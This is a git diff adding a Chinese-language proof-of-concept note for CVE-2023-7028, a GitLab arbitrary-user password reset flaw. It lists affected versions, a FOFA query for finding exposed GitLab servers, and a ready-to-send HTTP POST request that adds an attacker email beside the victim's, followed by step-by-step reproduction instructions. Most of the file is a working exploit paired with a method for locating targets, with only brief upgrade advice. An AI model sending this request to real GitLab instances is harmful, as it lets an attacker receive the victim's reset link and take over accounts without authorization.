diff --git a/GitLab任意用户密码重置漏洞(CVE-2023-7028).md b/GitLab任意用户密码重置漏洞(CVE-2023-7028).md new file mode 100644 index 0000000..222e804 --- /dev/null +++ b/GitLab任意用户密码重置漏洞(CVE-2023-7028).md @@ -0,0 +1,69 @@ +## GitLab任意用户密码重置漏洞(CVE-2023-7028) + +2024年1月11日,Gitlab 官方披露 CVE-2023-7028,GitLab 任意用户密码重置漏洞,官方评级严重。攻击者可利用忘记密码功能,构造恶意请求获取密码重置链接从而重置密码。官方已发布安全更新,建议升级至最新版本,若无法升级,建议利用安全组功能设置 Gitlab 仅对可信地址开放。 + +1、需获取系统已有用户注册邮箱地址 + +2、满足影响版本 + +## 影响版本 +``` +16.1 <=GitLab CE<16.1.6 +16.2 <=GitLab CE<16.2.8 +16.3 <=GitLab CE<16.3.6 +16.4 <=GitLab CE<16.4.4 +16.5 <=GitLab CE<16.5.6 +16.6 <=GitLab CE<16.6.4 +16.7 <=GitLab CE<16.7.2 +16.1 <=GitLab EE<16.1.6 +16.2 <=GitLab EE<16.2.8 +16.3 <=GitLab EE<16.3.6 +16.4 <=GitLab EE<16.4.4 +16.5 <=GitLab EE<16.5.6 +16.6 <=GitLab EE<16.6.4 +16.7 <=GitLab EE<16.7.2 +``` + +## fofa +``` +app="GitLab" +``` + +## poc +``` +POST /users/password/ HTTP/1.1 +Host: g +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 150 +Origin: https://git.ryzoweba.com +Connection: keep-alive +Cookie: _gitlab_session=78331028df93ce92682f77ac91945004; preferred_language=en +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +authenticity_token=Ok6w7Wt0FwKeOCci9ucskZWrjRDDV0kYkwlSOIrGQmmQ2fk5k3vsH-8vM5UIiGn-0tpJ9D78SUb-9AT1TZ8VfA&user%5Bemail%5D=目标邮箱&user[email][]=攻击者邮箱 +``` + +## 漏洞复现 +访问找回密码页面:/users/password/new +![2af3cf985729d3808db6273dcc07b84b](https://github.com/wy876/POC/assets/139549762/f48c3792-5d70-4cea-a2f5-1ac3a1e3af6e) + +填写被找回邮箱地址,然后点击抓包 +![7d63bb3712a59358211cd86b02d52674](https://github.com/wy876/POC/assets/139549762/5fb2529f-50a5-44ce-923a-ad6f7b1eb631) + +修改请求包为:user[email][]=目标邮箱地址&user[email][]=攻击者邮箱地址 +![f7080e955aa0be982d53c73f2d817696](https://github.com/wy876/POC/assets/139549762/71fb4d67-891b-4388-a059-7b609605ff2b) + +![3dd9cf887b37a83c2d1e7290f2e1b78f](https://github.com/wy876/POC/assets/139549762/ba695d81-ae4d-4fc8-b35b-27074a5973d3) + + +## 漏洞来源 +- https://mp.weixin.qq.com/s/fFjOhcjtYh-hYsdYDsCA1Q +